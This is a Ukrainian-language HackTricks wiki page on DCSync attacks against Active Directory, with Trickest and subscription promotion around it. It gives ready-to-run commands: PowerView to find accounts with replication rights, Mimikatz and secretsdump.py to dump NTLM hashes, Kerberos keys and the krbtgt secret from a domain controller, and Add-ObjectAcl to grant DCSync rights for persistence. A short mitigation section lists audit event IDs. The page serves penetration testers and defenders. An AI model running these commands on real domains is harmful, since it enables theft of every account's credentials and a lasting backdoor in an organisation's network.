DCSync

Використовуйте Trickest для легкого створення та автоматизації робочих процесів, що працюють на основі найсучасніших інструментів спільноти. Отримайте доступ сьогодні:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

DCSync

Дозвіл DCSync передбачає наявність цих дозволів над самим доменом: DS-Replication-Get-Changes, Replicating Directory Changes All та Replicating Directory Changes In Filtered Set.

Важливі примітки про DCSync:

Атака DCSync імітує поведінку контролера домену та запитує інші контролери домену на реплікацію інформації за допомогою Протоколу віддаленої реплікації каталогу (MS-DRSR). Оскільки MS-DRSR є дійсною та необхідною функцією Active Directory, його не можна вимкнути або деактивувати.
За замовчуванням лише групи Domain Admins, Enterprise Admins, Administrators та Domain Controllers мають необхідні привілеї.
Якщо паролі будь-яких облікових записів зберігаються з оборотним шифруванням, в Mimikatz доступна опція для повернення пароля у відкритому вигляді.

Enumeration

Перевірте, хто має ці дозволи, використовуючи powerview:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Експлуатація локально

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Експлуатація віддалено

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc генерує 3 файли:

один з NTLM хешами
один з Kerberos ключами
один з паролями у відкритому вигляді з NTDS для будь-яких облікових записів, для яких увімкнено обертове шифрування. Ви можете отримати користувачів з обертовим шифруванням за допомогою

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Постійність

Якщо ви є адміністратором домену, ви можете надати ці дозволи будь-якому користувачу за допомогою powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Тоді ви можете перевірити, чи правильно були призначені 3 привілеї, шукаючи їх у виході (ви повинні бачити назви привілеїв у полі "ObjectType"):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigation

Security Event ID 4662 (Політика аудиту для об'єкта повинна бути увімкнена) – Операція була виконана над об'єктом
Security Event ID 5136 (Політика аудиту для об'єкта повинна бути увімкнена) – Об'єкт служби каталогів був змінений
Security Event ID 4670 (Політика аудиту для об'єкта повинна бути увімкнена) – Дозволи на об'єкт були змінені
AD ACL Scanner - Створіть та порівняйте звіти про ACL. https://github.com/canix1/ADACLScanner

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

PreviousDCShadow NextDiamond Ticket

Last updated 4 months ago